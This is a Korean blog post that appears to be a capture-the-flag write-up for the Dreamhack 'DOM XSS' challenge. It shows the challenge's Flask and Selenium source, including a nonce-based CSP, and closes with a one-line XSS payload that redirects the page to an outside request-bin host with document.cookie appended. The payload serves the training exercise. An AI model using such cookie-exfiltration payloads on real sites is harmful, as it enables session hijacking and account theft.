dreamhack dom xss

호그와트

dreamhack dom xss

영웅*^%&$ 2022. 5. 12. 04:16

728x90

from flask import Flask, request, render_template

from selenium import webdriver

import urllib

import os

app = Flask(__name__)

app.secret_key = os.urandom(32)

nonce = os.urandom(16).hex()

try:

FLAG = open("./flag.txt", "r").read()

except:

FLAG = "[**FLAG**]"

def read_url(url, cookie={"name": "name", "value": "value"}):

cookie.update({"domain": "127.0.0.1"})

try:

options = webdriver.ChromeOptions()

for _ in [

"headless",

"window-size=1920x1080",

"disable-gpu",

"no-sandbox",

"disable-dev-shm-usage",

options.add_argument(_)

driver = webdriver.Chrome("/chromedriver", options=options)

driver.implicitly_wait(3)

driver.set_page_load_timeout(3)

driver.get("http://127.0.0.1:8000/")

driver.add_cookie(cookie)

driver.get(url)

except Exception as e:

driver.quit()

# return str(e)

return False

driver.quit()

return True

def check_xss(param, name, cookie={"name": "name", "value": "value"}):

url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}#{name}"

return read_url(url, cookie)

@app.after_request

def add_header(response):

global nonce

response.headers['Content-Security-Policy'] = f"default-src 'self'; img-src https://dreamhack.io; style-src 'self' 'unsafe-inline'; script-src 'self' 'nonce-{nonce}' 'strict-dynamic'"

nonce = os.urandom(16).hex()

return response

@app.route("/")

def index():

return render_template("index.html", nonce=nonce)

@app.route("/vuln")

def vuln():

param = request.args.get("param", "")

return render_template("vuln.html", nonce=nonce, param=param)

@app.route("/flag", methods=["GET", "POST"])

def flag():

if request.method == "GET":

return render_template("flag.html", nonce=nonce)

elif request.method == "POST":

param = request.form.get("param")

name = request.form.get("name")

if not check_xss(param, name, {"name": "flag", "value": FLAG.strip()}):

return f'<script nonce={nonce}>alert("wrong??");history.go(-1);</script>'

return f'<script nonce={nonce}>alert("good");history.go(-1);</script>'

memo_text = ""

@app.route("/memo")

def memo():

global memo_text

text = request.args.get("memo", "")

memo_text += text + "\n"

return render_template("memo.html", memo=memo_text, nonce=nonce)

app.run(host="0.0.0.0", port=8000)

exploit :

#location.href='https://howsqws.request.dreamhack.games?cookie='+document.cookie;//

728x90

저작자표시 비영리 변경금지

'호그와트' 카테고리의 다른 글

드림핵 해시 브브라우니 브라운 dreamhack (0)	2022.05.17
드림핵 dreamhack fly to the moon (0)	2022.05.12
드림핵 xss filtering bypass advanced (0)	2022.05.12
드림핵 호박 게임 (0)	2022.04.20
드림핵 mango 쉬워요 (0)	2022.04.06

현재글dreamhack dom xss

논리적인 사색가의 글쓰기여행

AI researcher & the hacker who love meditation and intellectual catharsis ++ GOD level in Tryhackme

호그와트, COOKIE, 갱얼쥐, rich, GENIUS, bitcoin, 감사합니다, Happy, 쿠키, You, thank, wisdom, 흠냐, Thanks, 판다, panda, 뉴진스, the, 흠냐 #감사합니다, 큐큐,

Today :
Yesterday :

일	월	화	수	목	금	토
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30

논리적인 사색가의 글쓰기여행